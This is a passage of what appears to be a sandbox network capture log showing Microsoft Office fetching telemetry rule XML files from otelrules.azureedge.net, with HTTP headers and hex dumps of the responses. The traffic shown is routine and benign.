                                                                                                                                                                                                                      2024-11-20 16:42:16 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      125192.168.2.74990313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:17 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:17 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1354
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                      x-ms-request-id: 7ca1e40b-601e-003d-2f8c-3a6f25000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164217Z-r1d97b99577tssmjhC1TEB8kan00000009400000000010c6
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:17 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      126192.168.2.74990213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:17 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:17 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1391
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                      x-ms-request-id: c0af4880-401e-00ac-328c-3a0a97000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164217Z-1777c6cb754mqztshC1TEB4mkc00000009ug00000000qt7b
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:17 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      127192.168.2.74990413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:17 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:17 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                      x-ms-request-id: 62f37542-501e-0016-6f8c-3a181b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164217Z-1777c6cb754gvvgfhC1TEBz4rg00000009y000000000b8gp
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:17 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      128192.168.2.74991113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:18 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:18 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:18 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                      x-ms-request-id: 443fb44f-501e-0029-3f61-3bd0b8000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164218Z-185f5d8b95c9mqtvhC1NYCghtc0000000ahg00000000kpdb
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:18 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      129192.168.2.74991213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:18 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:18 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                      x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164218Z-r1d97b99577gg97qhC1TEBcrf400000008ug00000000sxvy
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:18 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      130192.168.2.74992413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:19 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:19 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                      x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164219Z-r1d97b99577hsvhhhC1TEByb1w00000003fg000000003g94
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      131192.168.2.74992313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:19 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:19 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1362
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                      x-ms-request-id: 538caadb-101e-0028-028c-3a8f64000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164219Z-185f5d8b95csp6jmhC1NYCwy6s0000000ae000000000gxp3
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      132192.168.2.74992513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:19 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:19 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                      x-ms-request-id: 7bd1ae59-401e-008c-598c-3a86c2000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164219Z-185f5d8b95c96jn4hC1NYCbgp80000000akg000000002tp3
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      133192.168.2.74993013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:20 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                      x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164220Z-1777c6cb754wcxkwhC1TEB3c6w00000009r000000000qesp
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
